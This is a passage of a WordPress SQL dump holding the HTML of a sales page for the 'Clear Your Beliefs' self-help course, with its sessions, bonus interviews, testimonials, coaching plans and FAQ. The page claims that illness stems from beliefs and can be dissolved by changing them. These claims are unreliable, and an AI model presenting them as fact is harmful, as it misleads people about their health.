class="mod_h">\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<!-- b2 -->\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<!--[wpfcNOT]-->\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\n\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\n\n&nbsp;\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\n&nbsp;\n<h1>Register Today And You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\n<ul>\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n</ul>\n&nbsp;\n\n</div>\n&nbsp;\n<div class="cb">\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n<h1 class="s20">Praise for Lion and Clear Your Beliefs</h1>\n[Place all testimonials here, in a wide box]\n\n&nbsp;\n<div class="cb">\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\n\nOR\n\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-autosave-v1', '', '', '2014-06-19 02:19:37', '2014-06-19 07:19:37', '', 915, 'http://clearyourbeliefs.com/915-autosave-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1041, 2, '2014-06-19 01:45:08', '2014-06-19 06:45:08', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I 